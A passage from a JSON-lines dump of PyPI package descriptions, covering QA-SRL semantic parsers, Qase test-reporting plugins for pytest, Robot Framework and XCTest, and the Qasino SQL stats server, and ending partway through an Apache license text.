\"R2\" to a second direct object, and \"R2_\" to an indirect object (e.g. \"R2_on\" <-> \"what did someone put somethingon?\"). For modifiers (\"where\", \"when\", \"how\", \"why\", \"how long\", \"how much\") the WH-word (plus, optionally, the preposition) is defining the \"question-role\". See Table 7 at theQA-SRL 2015 paperfor more details about the set of Roles and the heuristic mapping.QA-SRL Question slots:Setreturn_qasrl_slots=Truein initialization to get detailed information about each QA-SRL question. This includes the 7 slots comprising the question, the verb inflection, voice (\"is_passive\") and negation (\"is_negated\").Nominal predicate detection:nominalization_detection_threshold--- which can be set globally in initialization and per__call__--- is the threshold for the nominalization detection model.\nA higher threshold (e.g.0.8) means capturing less nominal predicates with higher confidence of them being, in context, verb-derived event markers. Default threshold is0.7.OpenIE converter:Setoutput_openie=True(in__call__) in order to get a reduction of output QAs into Open Information Extraction's tuples format. This option uses theqasem.openie_converter.OpenIEConverterclass to linearize the arguments along with the predicate by the order of occurrence in the source sentence.\nThe pipeline's output would then be in the form{\"qasem\": , \"openie\": }.By default, only verbal QA-SRL QAs would be converted, but one can specifylayers_included=[\"qasrl\", \"qanom\"]when initializingOpenIEConverterto also include nominalizations' QAs.\nYou can set arguments forOpenIEConverterin theQASemEndToEndPipelineconstructor using theopenie_converter_kwargsargument, e.g.QASemEndToEndPipeline(openie_converter_kwargs={\"layers_included\": [\"qasrl\", \"qanom\"]}).Examplefromqasem.end_to_end_pipelineimportQASemEndToEndPipelinepipe=QASemEndToEndPipeline(annotation_layers=('qasrl','qanom','qadiscourse'),nominalization_detection_threshold=0.75,contextualize=True)sentences=[\"The doctor was interested in Luke 's treatment as he was still not feeling well .\",\"Tom brings the dog to the park.\"]outputs=pipe(sentences)print(outputs)Outputs[{'qanom':[{'QAs':[{'question':'who was treated ?','answers':['Luke'],'contextual_question':'Who was treated?'}],'predicate_idx':7,'predicate':'treatment','predicate_detector_probability':0.8152085542678833,'verb_form':'treat'}],'qasrl':[...],'qadiscourse':[{'question':'What is the cause of the doctor being interested in Luke 'streatment?','answer':'he was still not feeling well'}]},},{'qanom':[],'qasrl':[{'QAs':[{'question':'who brings something ?','answers':['Tom'],'contextual_question':'Who brings the dog?'},{'question':' what does someone bring ?','answers':['the dog'],'contextual_question':'What does Tom bring?'},{'question':' where does someone bring something ?','answers':['to the park'],'contextual_question':'Where does Tom bring the dog?'}],'predicate_idx':1,'predicate':'brings','verb_form':'bring'}]}],'qadiscourse':[]}Repository for Model Training & ExperimentsThe underlying QA-SRL and QANom models were trained and evaluated using the code atqasrl-seq2seqrepository.The code for training and evaluating the QADiscourse model will be uploaded soon.Cite@article{klein2022qasem,\n title={QASem Parsing: Text-to-text Modeling of QA-based Semantics},\n author={Klein, Ayal and Hirsch, Eran and Eliav, Ron and Pyatkin, Valentina and Caciularu, Avi and Dagan, Ido},\n journal={arXiv preprint arXiv:2205.11413},\n year={2022}}"} +{"package": "qasem-parser", "pacakge-description": "Parser for Question-Answer based SemanticsAbout The ProjectReimplementation of theQA-SEM pipelinewith re-trained joint argument parser modelGetting StartedInstallationpipinstallqasem_parserUsagefromtypingimportListfromqasem_parserimportQasemParser,QasemFramearg_parser_path=\"cattana/flan-t5-large-qasem-joint-tokenized\"parser=QasemParser.from_pretrained(arg_parser_path)sentences=[\"The fox jumped over the fence.\",\"Back in May, a signal consistent with that of a radio beacon was detected in the area, but nothing turned up that helped with the search.\"]# frames is a list of lists, with one sublist per sentence such that len(frames) == len(sentences)# frames[i] is a sublist of the semantic frames that occur within sentence[i]frames:List[List[QasemFrame]]=parser(sentences)print(frames[1][0])# detect-v: Back in May (when: when was something detected?)# | a signal consistent with that of a radio beacon (R1: what was detected?)# | in the area (where: where was something detected?)# The parser also respects original tokenization# if the input is a batch of tokenized sentencespretokenized_sentences=[\"Unfortunately , extensive property damage is bound to occur even with the best preparation .\".split(),\"Afghanistan to attend the summit after following the election in June , \"\"but the ongoing audit of votes has made this impossible .\".split()]frames=parser(pretokenized_sentences)forframes_per_sentinframes:# NOTE: frames_per_sent might be empty if no predicate# is detected in the sentence.forframeinframes_per_sent:print(frame)print()## bind-v: extensive property damage (R0: what is bound to do something?)# | occur even with the best preparation (R1: what is something bound to do?)# occur-v: extensive property damage (R0: what is occurring?)# | even with the best preparation (how: how is something occurring?)# damage-n: extensive property (R1: what is damaged?)# prepare-n: extensive property damage (R1: what is prepared?)## call-v: Plans (R0: what called for something?)# | the new President , or President-elect , of Afghanistan to attend the summit after following the election in June (R1: what did something call for?)# attend-v: the new President , or President-elect , of Afghanistan (R0: who attends something?)# | the summit (R1: what does someone attend?)# | after following the election in June (when: when does someone attend something?)# follow-v: the election (R1: what was followed?)# | in June (when: when was something followed?)# make-v: the ongoing audit of votes (R0: what made something?) | this impossible (R1: what did something make?)# plan-n: Plans (R0: what planned something?)# | the new President , or President-elect , of Afghanistan to attend the summit after following the election in June , but the ongoing audit of votes has made this impossible (R1: what did something plan?)# elect-n: the new President , or President-elect , of Afghanistan (R1: what was elected?)# | in June (when: when was something elected?)# audit-n: votes (R1: what was audited?)(back to top)LicenseDistributed under the MIT License. SeeLICENSEfor more information.ContactPaul Roit -@paul_roitProject Link:https://github.com/plroit/qasem_parser(back to top)AcknowledgmentsAyal KleinArie Cattan(back to top)"} +{"package": "qase-pytest", "pacakge-description": "QasePytest PluginInstallationpip install qase-pytestUpgrade from 4.x to 5.xA new version of qase-pytest reporter has breaking changes. Follow theseguidethat will help you to migrate to a new version.ConfigurationQase Pytest Plugin can be configured in multiple ways:using a config fileqase.config.jsonusing environment variablesusing CLI optionsAll configuration options are listed in the following doc:Configuration.Example: qase.config.json{\n\t\"mode\": \"testops\", \n\t\"fallback\": \"report\",\n\t\"report\": {\n\t\t\"driver\": \"local\",\n\t\t\"connection\": {\n\t\t\t\"local\": {\n\t\t\t\t\"path\": \"./build/qase-report\",\n\t\t\t\t\"format\": \"json\" \n\t\t\t}\n\t\t}\n\t},\n\t\"testops\": {\n\t\t\"bulk\": true,\n\t\t\"api\": {\n\t\t\t\"token\": \"YOUR_API_TOKEN\",\n\t\t\t\"host\": \"qase.io\"\n\t\t},\n\t\t\"run\": {\n \"id\": 1,\n\t\t\t\"title\": \"Test run title\",\n\t\t\t\"complete\": true\n\t\t},\n \"plan\": {\n \"id\": 1\n },\n\t\t\"defect\": true,\n\t\t\"project\": \"YOUR_PROJECT_CODE\",\n\t\t\"chunk\": 200\n\t},\n\t\"framework\": {\n\t\t\"pytest\": {\n\t\t\t\"capture\": {\n\t\t\t\t\"logs\": true,\n\t\t\t\t\"http\": true\n\t\t\t}\n\t\t}\n\t},\n\t\"environment\": \"local\"\n}UsageLink tests with test cases in Qase TestOpsTo link tests in code with tests in Qase TestOps you can use predefined decorators:fromqaseio.pytestimportqase@qase.id(13)@qase.title(\"My first test\")@qase.fields((\"severity\",\"critical\"),(\"priority\",\"hight\"),(\"layer\",\"unit\"),(\"description\",\"Try to login in Qase TestOps using login and password\"),(\"description\",\"*Precondition 1*. Markdown is supported.\"),)deftest_example_1():passEach unique number can only be assigned once to the class or function being used.Ignore a particular testIf you want to exclude a particular test from the report, you can use the@qase.ignoredecorator:fromqaseio.pytestimportqase@qase.ignoredeftest_example_1():passPossible test result statusesPASSED - when test passedFAILED - when test failed with AssertionErrorBLOCKED - when test failed with any other exceptionSKIPPED - when test has been skippedCapture network logsIn order to capture network logs, you need to enable thehttpoption in thecapturesection of theframeworksection in the config file.Qase Pytest reporter will capture all requests and responses and save as a test step automatically.Add attachments to test resultsWhen you need to push some additional information to server you could use\nattachments:importpytestfromqaseio.pytestimportqase@pytest.fixture(scope=\"session\")defdriver():driver=webdriver.Chrome()yielddriverlogs=\"\\n\".join(str(row)forrowindriver.get_log('browser')).encode('utf-8')qase.attach((logs,\"text/plain\",\"browser.log\"))driver.quit()@qase.title(\"My first test\")deftest_example_1():qase.attach(\"/path/to/file\",\"/path/to/file/2\")qase.attach((\"/path/to/file/1\",\"application/json\"),(\"/path/to/file/3\",\"application/xml\"),)@qase.id(12)deftest_example_2(driver):qase.attach((driver.get_screenshot_as_png(),\"image/png\",\"result.png\"))You could pass as much files as you need.Also you should know, that if no case id is associated with current test in\npytest - attachment would not be uploaded:importpytestfromqaseio.pytestimportqase@pytest.fixture(scope=\"session\")defdriver():driver=webdriver.Chrome()yielddriverlogs=\"\\n\".join(str(row)forrowindriver.get_log('browser')).encode('utf-8')# This would do nothing, because last test does not have case id linkqase.attach((logs,\"text/plain\",\"browser.log\"))driver.quit()deftest_example_2(driver):# This would do nothingqase.attach((driver.get_screenshot_as_png(),\"image/png\",\"result.png\"))Linking code with stepsIt is possible to link test step with function, or using context.fromqaseio.pytestimportqase@qase.step(\"First step\")# test step namedefsome_step():sleep(5)@qase.step(\"Second step\")# test step namedefanother_step():sleep(3)...deftest_example():some_step()another_step()# test step hashwithqase.step(\"Third step\"):sleep(1)Sending tests to existing testrunTestrun in TestOps will contain only those test results, which are presented in testrun,\nbut every test would be executed.pytest\\--qase-mode=testops\\--qase-testops-api-token=\\--qase-testops-project=PRJCODE\\# project, where your testrun exists in--qase-testops-run-id=3# testrun idCreating test run base on test plan (selective launch)Create new testrun base on testplan. Testrun in Qase TestOps will contain only those\ntest results.qase-pytestsupports selective executionpytest\\--qase-mode=testops\\--qase-testops-api-token=\\--qase-testops-project=PRJCODE\\# project, where your testrun exists in--qase-testops-plan-id=3# testplan idCreating new testrun according to current pytest runIf you want to create a new test run in Qase TestOps for each execution, you can simply\nskip--qase-testops-runoption. If you want to provide a custom name for this run, you can add an\noption--qase-testops-run-titlepytest\\--qase-mode=testops\\--qase-testops-api-token=\\--qase-testops-project=PRJCODE\\# project, where your testrun would be created--qase-testops-run-title=My\\First\\Automated\\Run"} +{"package": "qase-python-commons", "pacakge-description": "Qase Python CommonsDescriptionThis package contains reporters for Qase TestOps and Qase Report that are used inqase-pytestandqase-robotframework.How to installpip install qase-python-commons"} +{"package": "qase-robotframework", "pacakge-description": "Qase Robot Framework ListenerPublish results simple and easy.How to integratepip install qase-robotframeworkUsageIf you want to create a persistent link to Test Cases in Qase, you should add Qase test case IDs to robot framework tests.\nThey should be added as a tags in form likeQ-. You can use upper and lower case to indicate the test case IDs. Example:*** Test Cases ***Push button[Tags]q-2Push button1Result should be1Push multiple buttons[Tags]Q-3Push button1Push button2Result should be12*** Test Cases ***ExpressionExpectedAddition12 + 2 + 2162 + -3-1[Tags]Q-7Subtraction12 - 2 - 282 - -35[Tags]Q-8Working with stepsListener supports reporting steps results:Example:Quick Get A JSON Body Test## Test case: \"Quick Get A JSON Body Test\"[Tags]Q-3${response}=GEThttps://jsonplaceholder.typicode.com/posts/1## 1-st step - \"GET\"Should Be Equal As Strings1${response.json()}[id]## 2-nd step - \"Should Be Equal As Strings\"Initializing the test case## Test case: \"Initializing the test case\"[Tags]q-4Set To Dictionary${info}field1=A sample string## 1-st step - \"Set To Dictionary\"ConfigurationListener supports loading configuration both from environment variables and fromtox.inifile.ENV variables:QASE_MODE- Define mode:testopsto enable reportQASE_ENVIRONMENT- Environment ID for the runQASE_DEBUG- If passed something - will enable debug logging for listener. Default:FalseQASE_TESTOPS_MODE- You can switch betweensyncandasyncmodes. Default isasyncQASE_TESTOPS_API_TOKEN- API token to access Qase TestOpsQASE_TESTOPS_PROJECT- Project code from Qase TestOpsQASE_TESTOPS_PLAN_ID- Plan ID if you want to add results to existing run from Test PlanQASE_TESTOPS_RUN_ID- Run ID if you want to add results to existing runQASE_TESTOPS_RUN_TITLE- Set custom run name when no run ID is providedQASE_TESTOPS_COMPLETE_RUN- Will complete run after all tests are finished. Default:FalseQASE_TESTOPS_HOST- Define a host for Qase TestOps. Default:qase.ioUsage:QASE_API_TOKEN= QASE_PROJECT=PRJCODE robot --listener qaseio.robotframework.QaseListener keyword_driven.robot data_driven.robotMoving variables totox.ini, example configuration:[qase]qase_testops_api_token=api_keyqase_testops_project=project_codeqase_testops_run_id=run_idqase_testops_run_title=New Robot Framework Runqase_debug=Trueqase_testops_complete_run=TrueExecution:robot --listener qaseio.robotframework.Listener someTest.robotContributionInstall project locally:python3-mvenv.venvsource.venv/bin/activate\npipinstall-e.[testing]Install dev requirements:pipinstallpre-commit\npre-commitinstallTest project:tox"} +{"package": "qase-xctest", "pacakge-description": "Qase XCTest UtilsHow to installpip install qase-xctestHow to useFor XCode--api_token YOUR_API_TOKEN- Api token for qase api. Get api tokenhere.--project_code YOUR_PROJECT_CODE- You can find project codehere.--build $BUILD_ROOT- Xcode build folder. Xcode setup$BUILD_ROOTenviroment automatically.\nAlways using this enviroment for--buildarg.--run_name From_Xcode- Arbitrary run name. You can detect your run result from all results.--upload_attachments- Send attachments from report.qasexcode--build$BUILD_ROOT\\--api_tokenYOUR_API_TOKEN\\--project_codeYOUR_PROJECT_CODE\\--run_nameFrom_Xcode\\--upload_attachmentsFor CI--xcresults- Paths to reports. If your reports will be contains one test result multiple times, enable settingsAllow to add results for cases in closed runs.in your project.qasexcode --xcresults PathToReport/1.xcresult PathToReport/2.xcresult \\\n --api_token YOUR_API_TOKEN \\\n --project_code YOUR_PROJECT_CODE \\\n --run_name From_ci \\\n --upload_attachments"} +{"package": "qashared", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qasimpdf", "pacakge-description": "This is the home page of application"} +{"package": "qasino_client", "pacakge-description": "Qasino======Qasino is a stats server that supports stats stored as tables in adatabase for querying with SQL. Unlike a conventional database, statsdo not accumulate over time (which would make querying the stats moredifficult). Instead Qasino keeps only the most recent set of statsreported. The full flexiblity of SQL including joining, filtering andaggregation are availble to analyze the current state of your network.Stats reported from different systems but using the same table nameare merged automatically into a single table. In addition schemas areautomatically created and updated based on the incoming updatesrequiring zero maintanence.Many stats systems provide history for stats but lack an effective wayto join, correlate or connect stats together. Qasino does not(directly) keep a history of stats but does make it really easy tocorrelate and cross reference stats together.Sometimes you want to know the current state of your systems and thatmight include more then just numerical data. Qasino excels at givingyou that information. You can report a richer set of data such astext data, datetimes or multi-row relationships. For example, cpuusage and ops per second, or configuration files with the md5sum ofeach and current timestamp.Qasino primarily is a server process. It exposes interfaces topublish tables to it using a JSON API via HTTP or ZeroMQ. There is asimple CLI client to connect to Qasino and run queries. There is asimple command line table publisher that can read input tables as CSVor JSON. And there is a more advanced publisher client meant to runas an agent that dynamically publishes CSV files.In the future there will be integration with stat collectors likeStatsd, Diamond and Graphite.Currently Qasino is implemented in Python using the Twisted frameworkand HTTP and ZeroMQ transports with Sqlite for the backend data store.Qasino was inspired by the monitoring system used at AkamaiTechnologies called Query. More information can be found[here](http://www.akamai.com/dl/technical_publications/lisa_2010.pdf \"Keeping Track of 70,000+ Servers: The Akamai Query System\")and [here](http://www.akamai.com/dl/technical_publications/query_osr.pdf \"Scaling a Monitoring Infrastructure for the Akamai Network\").Qasino provides similar functionality but for much smaller scale environments.##Installation###Git cloneTo run qasino, you can clone this repo. You'll need to have the followingPython libraries installed:- python-twisted- python-zmq- python-apsw- python-yaml- python-requests- python-txzmq- python-jinja2The server and the client can be run right from the main directory.They will find the libraries they need in the lib directory. To run the server:python bin/qasino_server.pyConnect with the SQL client:python bin/qasino_sqlclient.py -Hqasino-server-hostnameTo run the CSV publisher:python bin/qasino_csvpublisher.py --identity 1.2.3.4 --index-file index.csv###DockerAlternately, you can build qasino using [Docker](https://www.docker.com/).This will let you deploy qasino in a Docker container. Simply call the Dockerbuild command on the Dockerfile included in this repo:docker build -t=\"my-container-name\" /path/to/qasino/To run the qasino server using Docker, call `docker run` on the container youbuilt. You need to use the `-P` flag (or set port mappings manually) in orderto send requests to the qasino server. For example:docker run -P my-container-name /opt/qasino/bin/qasino_server.pyYou can find the ports that Docker assigned to your qasino container using`docker ps`.###Pip (client only)You can also install the qasino SQL client using `pip`. This will let you querya qasino server from the command line (like running the`bin/qasino_sqlclient.py` program). This should work on most Linux / OS Xcomputers:pip install qasino_clientAfterwards, the command `qasinosql` will start a command line interface to aqasino server. `qasinosql` takes the same flags as `qasino_sqlclient.py`; infact, the former is simply a wrapper around the latter. For example:qasinosql -H 1.2.3.4 -p 15598##OverviewThe qasino server receives requests from clients to publish tabulardata. The data is added to a backend sqlite database. The data iscollected for a fixed period (default 30 seconds) after which it issnapshotted. The snapshotted database becomes the data source for allincoming SQL requests until the next snapshot. For this reason allpublishers need to publish updated stats every snapshot period (withthe exception of static tables or persistent tables which aredescribed below).To orchestrate this process better the server publishes on a ZeroMQpub-sub channel the snapshot (aka generation) signal. This shouldtrigger all publishers to send table data. qasino_cvspublisher worksthis way. It is by no means required though. In fact a simplerapproach is just to have all publishers publish their data on aninterval that matches the generation interval.##Querying (SQL)Qasino has a SQL interface. Since Qasino uses SQLite on the backendyou can refer to the [SQLite SQL documentation](http://www.sqlite.org/lang.html)for SQL syntax details. Qasino can be queried with SQL using four different methods:###Web UIPoint your browser at Qasino and you'll get a basic web interface.The default page shows all the tables that Qasino knows about. Thereare also tabs for describing tables and inputing custom SQLstatements.###Line receiverConnect to a qasino server on port 15000 for line based text only queries. You cansimply connect using telnet and send your query.$ telnet 1.2.3.4 15000Trying 1.2.3.4...Connected to 1.2.3.4.Escape character is '^]'.select * from qasino_server_info;generation_number generation_duration_s generation_start_epoch================= ===================== ======================1382105093 30 1382105123.11 rows returned###Python ClientConnect using bin/qasino_sqlclient.py. This client uses ZeroMQ tosend JSON formated messages to the server. (It can also connect usingHTTPS given the --use-https option but that will require the rightcredentials to work).$ bin/qasino_sqlclient.py -H1.2.3.4Connecting to 1.2.3.4:15598.qasino> select * from qasino_server_info;generation_number generation_duration_s generation_start_epoch================= ===================== ======================1382119193 30 1382119223.11 rows returnedqasino>It uses a json message with the following simple format:{\"op\" : \"query\",\"sql\" : \"select * from qasino_server_info;\"}###HTTP InterfaceLastly you can connect with a simple HTTP request. The default HTTPport is 15597. These requests can also go to the SSL port 443 butwill require basic auth. There are a couple variations.First you can POST a JSON request:$ curl -X POST 'http://1.2.3.4:15597/request?op=query' -d '{ \"sql\" : \"select * from qasino_server_info;\" }'{\"table\": {\"rows\": [[\"1382119553\", \"30\", \"1382119583.1\"]], \"column_names\": [\"generation_number\", \"generation_duration_s\", \"generation_start_epoch\"]}, \"max_widths\": {\"1\": 21, \"0\": 17, \"2\": 22}, \"response_op\": \"result_table\", \"identity\": \"1.2.3.4\"}$Or you can make a GET request with 'sql' as a query string param (be sure to url-encode it):$ curl 'http://localhost:15597/request?op=query' --get --data-urlencode 'sql=select * from qasino_server_info;'{\"table\": {\"rows\": [[\"1382131545\", \"30\", \"1382131575.89\"]], \"column_names\": [\"generation_number\", \"generation_duration_s\", \"generation_start_epoch\"]}, \"max_widths\": {\"1\": 21, \"0\": 17, \"2\": 22}, \"response_op\": \"result_table\", \"identity\": \"1.2.3.4\"}Or make a GET request with the 'format=text' query string parameter to get a human readable rendering of the table. Note you can also put this url right in a browser.$ curl 'http://1.2.3.4:15597/request?op=query&format=text' --get --data-urlencode 'sql=select * from qasino_server_info;'generation_number generation_duration_s generation_start_epoch================= ===================== ======================1382131635 30 1382131665.891 rows returned$###Internal TablesQasino server automatically publishes the following internal tables:- qasino_server_info- qasino_server_tables- qasino_server_connections- qasino_server_viewsThe following commands are shortcuts to looking at these tables:- SHOW info;- SHOW tables;- SHOW connections;- SHOW views;The schema for a table can be found with 'DESC ;' and thedefinition of a view can be found with 'DESC VIEW ;'##PublishingCurrently the only publishing clients officially implemented are a CSVfile publisher that is meant to run as an agent remotely and publishesCSV files as tables (qasino_csvpublisher.py) and a command lineutility to publish one-offs from JSON or CSV input files (qasino_publish.py).All publishers must specify an \"identity\" which is a unique identifierthat tells the server where the input table is coming from. A giventablename can only be reported from the same identity once perreporting cycle but different identities can report rows for the sametablename - the results will be merged together.A common paradigm is to make the identity the hostname or IP addressof the machine reporting the rows. In addition it is suggested toinclude a column in the table that indicates the same thing (identity,hostname or IP address). In this way, two nifty things happen:1. All machines reporting rows for a common table (lets say 'table_foo') will be merged together.2. You can make queries that select by machine e.g. \"SELECT * FROM table_foo WHERE identity IN ('1.2.3.4', '5.6.7.8');\"###Schema MergingTypically all your publishers have the same schema for a given tablebut if its different (perhaps if you are rolling out a new releasethat adds columns to a table) the server will always add columns thatdon't already exist in the table. The schema you will end up withwill be a union of all the columns.Changing types of an existing column is not recommended (there may besome undefined behavior). Just add a new column with the differenttype.###TypesCSV input tables (see below) support the following types (and are converted into the types in the JSON list below):- string (also str)- ip (alias for string)- float- integer (also int)- ll (alias for integer)- time (alias for integer)JSON input tables (see below) support the following types (which are sqlite types):- integer- real- text###Qasino_csvpublisher.pyqasino_csvpublisher.py takes an index file with a list of CSV files init to publish and/or a index list file with a list of index files toprocess in the same way. It runs until killed and monitors theindexes and tables they refer to for changes. The data is continuallypublished to the server every cycle so that the CSV content is alwaysreflected in tables on the server. The intent is so that applicationsor processes can simply drop properly formated CSV files intolocations and they will automatically get loaded and published to theserver.####Index File FormatAn index file starts with a version number followed by one or more CSV tables to publish.Each line specifying a table to publish contains either a filename and tablename or just a tablename where the filename is inferred.So either:,or justIn the latter case the filename is inferred to be `.csv`.So for example you might have an index file `myindex.csv` like the following:1myapplication_table1myapplication_table2####CSV File FormatThe CSV files contain the following format:...So for example you might create a file `myapplication_table1.csv`:1myapplication_table1ipaddr,datacenter,stat1,stat2ip,string,integer,integerIP Address,Datacenter,Num Frobs,Num Foobs1.2.3.4,BOS,123,456And then you might run the csv publisher like this:python bin/qasino_csvpublisher.py --index myindex.csv --identity 1.2.3.4###Qasino_publish.pyThe command line utility qasino_publish.py reads from file or stdin aninput table (CSV or JSON) and sends it via HTTP, HTTPS or ZeroMQ to aserver. Its largely meant as an example client but could be used in acron or script. See --help for more information. See above for CSV file format.###HTTP PublishingYou can publish by sending a properly formatted JSON request via an HTTP connection.For example to publish the same \"myapplication_table1\" table you could put the following in a file `myapplication_table1.json`:{ \"op\" : \"add_table_data\",\"identity\" : \"1.2.3.4\",\"table\" : { \"tablename\" : \"myapplication_table1\",\"column_names\" : [ \"ipaddr\", \"datacenter\", \"stat1\", \"stat2\" ],\"column_types\" : [ \"ip\", \"string\", \"int\", \"int\" ],\"rows\" : [ [ \"1.2.3.4\", \"BOS\", 123, 456 ] ]}}And then send the following curl:$ curl -d @myapplication_table1.json -X POST 'http://1.2.3.4:15597/request?op=add_table_data'{\"identity\": \"1.2.3.4\", \"response_op\": \"ok\"}$The table should appear in Qasino. Publishing would have to happen regularly for it to persist.$ bin/qasino_sqlclient.pyConnecting to 1.2.3.4:15598.qasino> select * from qasino_server_tables where tablename = 'myapplication_table1';tablename====================myapplication_table11 rows returnedqasino> select * from myapplication_table1;ipaddr datacenter stat1 stat2======= ========== ===== =====1.2.3.4 BOS 123 4561 rows returnedqasino>###Persistent tablesA node can publish a table with the option 'persist' to indicate thatthe table should be carried through each generation. An option isgiven in the top level dict of the JSON object. For example:{ \"op\" : \"add_table_data\",\"persist\" : 1,\"identity\" : \"1.2.3.4\",\"table\" : { \"tablename\" : \"myapplication_table1\",\"column_names\" : [ \"ipaddr\", \"datacenter\", \"stat1\", \"stat2\" ],\"column_types\" : [ \"ip\", \"string\", \"int\", \"int\" ],\"rows\" : [ [ \"1.2.3.4\", \"BOS\", 123, 456 ] ]}}Some things to note.- The stats are carried forward for each successive generation so that means the server has to hold onto an extra copy of the stats which can consume additional memory.- If the server is restarted the persistent stats will go away until they are resent.- The tables are tracked per tablename (at the moment), so multiple updates for the same table overwrite.###Static tablesStatic tables are set using the \"static\" option similar to persistabove but get loaded into a special persistent Sqlite DB that isconnected to the ephemeral databases. Tables that are static persistbetween Qasino server restarts. They are also stored by tablename somultiple updates to the same table overwrite.###ViewsViews are supported by using a view configuration file. The Qasinoserver will look by default (change it with the --views-file option)for a file in the current directory called 'views.conf' that is a YAMLfile that has the following format:---- viewname: testviewview: |create view testview as select* from qasino_server_info;- viewname: anotherviewview: |create view anotherview as select* from qasino_server_tables;It is an array of items with 'viewname' and 'view' properties. The'view' property specifies the actual view to create.The views file is monitored for changes and automatically reloaded.You can get the definition of a view from the qasino_server_viewstable or the 'DESC VIEW' command."} +{"package": "qask", "pacakge-description": "qaskCreate default skeleton app for new qa project"} +{"package": "qasm", "pacakge-description": "TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTIONDefinitions.\u201cLicense\u201d shall mean the terms and conditions for use, reproduction,\nand distribution as defined by Sections 1 through 9 of this document.\u201cLicensor\u201d shall mean the copyright owner or entity authorized by\nthe copyright owner that is granting the License.\u201cLegal Entity\u201d shall mean the union of the acting entity and all\nother entities that control, are controlled by, or are under common\ncontrol with that entity. For the purposes of this definition,\n\u201ccontrol\u201d means (i) the power, direct or indirect, to cause the\ndirection or management of such entity, whether by contract or\notherwise, or (ii) ownership of fifty percent (50%) or more of the\noutstanding shares, or (iii) beneficial ownership of such entity.\u201cYou\u201d (or \u201cYour\u201d) shall mean an individual or Legal Entity\nexercising permissions granted by this License.\u201cSource\u201d form shall mean the preferred form for making modifications,\nincluding but not limited to software source code, documentation\nsource, and configuration files.\u201cObject\u201d form shall mean any form resulting from mechanical\ntransformation or translation of a Source form, including but\nnot limited to compiled object code, generated documentation,\nand conversions to other media types.\u201cWork\u201d shall mean the work of authorship, whether in Source or\nObject form, made available under the License, as indicated by a\ncopyright notice that is included in or attached to the work\n(an example is provided in the Appendix below).\u201cDerivative Works\u201d shall mean any work, whether in Source or Object\nform, that is based on (or derived from) the Work and for which the\neditorial revisions, annotations, elaborations, or other modifications\nrepresent, as a whole, an original work of authorship. For the purposes\nof this License, Derivative Works shall not include works that remain\nseparable from, or merely link (or bind by name) to the interfaces of,\nthe Work and Derivative Works thereof.\u201cContribution\u201d shall mean any work of authorship, including\nthe original version of the Work and any modifications or additions\nto that Work or Derivative Works thereof, that is intentionally\nsubmitted to Licensor for inclusion in the Work by the copyright owner\nor by an individual or Legal Entity authorized to submit on behalf of\nthe copyright owner. For the purposes of this definition, \u201csubmitted\u201d\nmeans any form of electronic, verbal, or written communication sent\nto the Licensor or its representatives, including but not limited to\ncommunication on electronic mailing lists, source code control systems,\nand issue tracking systems that are managed by, or on behalf of, the\nLicensor for the purpose of discussing and improving the Work, but\nexcluding communication that is conspicuously marked or otherwise\ndesignated in writing by the copyright owner as \u201cNot a Contribution.\u201d\u201cContributor\u201d shall mean Licensor and any individual or Legal Entity\non behalf of whom a Contribution has been received by Licensor and\nsubsequently incorporated within the Work.Grant of Copyright License. Subject to the terms and conditions of\nthis License, each Contributor hereby grants to You a perpetual,\nworldwide, non-exclusive, no-charge, royalty-free, irrevocable\ncopyright license to reproduce, prepare Derivative Works of,\npublicly display, publicly perform, sublicense, and distribute the\nWork and such Derivative Works in Source or Object form.Grant of Patent License. Subject to the terms and conditions of\nthis License, each Contributor hereby grants to You a perpetual,\nworldwide, non-exclusive, no-charge, royalty-free, irrevocable\n(except as stated in this section) patent license to make, have made,\nuse, offer to sell, sell, import, and otherwise transfer the Work,\nwhere such license applies only to those patent claims licensable\nby such Contributor that are necessarily infringed by their\nContribution(s) alone or by combination of their Contribution(s)\nwith the Work to which such Contribution(s) was submitted. If You\ninstitute patent litigation against any entity (including a\ncross-claim or counterclaim in a lawsuit) alleging that the Work\nor a Contribution incorporated within the Work constitutes direct\nor contributory patent infringement, then any patent licenses\ngranted to You under this License for that Work shall terminate\nas of the date such litigation is filed.Redistribution. You may reproduce and distribute copies of the\nWork or Derivative Works thereof in any medium, with or without\nmodifications, and in Source or Object form, provided that You\nmeet the following conditions:You must give any other recipients of the Work or\nDerivative Works a copy of this License; andYou must cause any modified files to carry prominent notices\nstating that You changed the files; andYou must retain, in the Source form of any Derivative Works\nthat You distribute, all copyright, patent, trademark, and\nattribution notices from the Source form of the Work,\nexcluding those notices that do not pertain to any part of\nthe Derivative Works; andIf the Work includes a \u201cNOTICE\u201d text file as part of its\ndistribution, then any Derivative Works that You distribute must\ninclude a readable copy of the attribution notices contained\nwithin such NOTICE file, excluding those notices that do not\npertain to any part of the Derivative Works, in at least one\nof the following places: within a NOTICE text file distributed\nas part of the Derivative Works; within the Source form or\ndocumentation, if provided along with the Derivative Works; or,\nwithin a display generated by the Derivative Works, if and\nwherever such third-party notices normally appear. The contents\nof the NOTICE file are for informational purposes only and\ndo not modify the License. You may add Your own attribution\nnotices within Derivative Works that You distribute, alongside\nor as an addendum to the NOTICE text from the Work, provided\nthat such additional attribution notices cannot be construed\nas modifying the License.You may add Your own copyright statement to Your modifications and\nmay provide additional or different license terms and conditions\nfor use, reproduction, or distribution of Your modifications, or\nfor any such Derivative Works as a whole, provided Your use,\nreproduction, and distribution of the Work otherwise complies with\nthe conditions stated in this License.Submission of Contributions. Unless You explicitly state otherwise,\nany Contribution intentionally submitted for inclusion in the Work\nby You to the Licensor shall be under the terms and conditions of\nthis License, without any additional terms or conditions.\nNotwithstanding the above, nothing herein shall supersede or modify\nthe terms of any separate license agreement you may have executed\nwith Licensor regarding such Contributions.Trademarks. This License does not grant permission to use the trade\nnames, trademarks, service marks, or product names of the Licensor,\nexcept as required for reasonable and customary use in describing the\norigin of the Work and reproducing the content of the NOTICE file.Disclaimer of Warranty. Unless required by applicable law or\nagreed to in writing, Licensor provides the Work (and each\nContributor provides its Contributions) on an \u201cAS IS\u201d BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\nimplied, including, without limitation, any warranties or conditions\nof TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A\nPARTICULAR PURPOSE. You are solely responsible for determining the\nappropriateness of using or redistributing the Work and assume any\nrisks associated with Your exercise of permissions under this License.Limitation of Liability. In no event and under no legal theory,\nwhether in tort (including negligence), contract, or otherwise,\nunless required by applicable law (such as deliberate and grossly\nnegligent acts) or agreed to in writing, 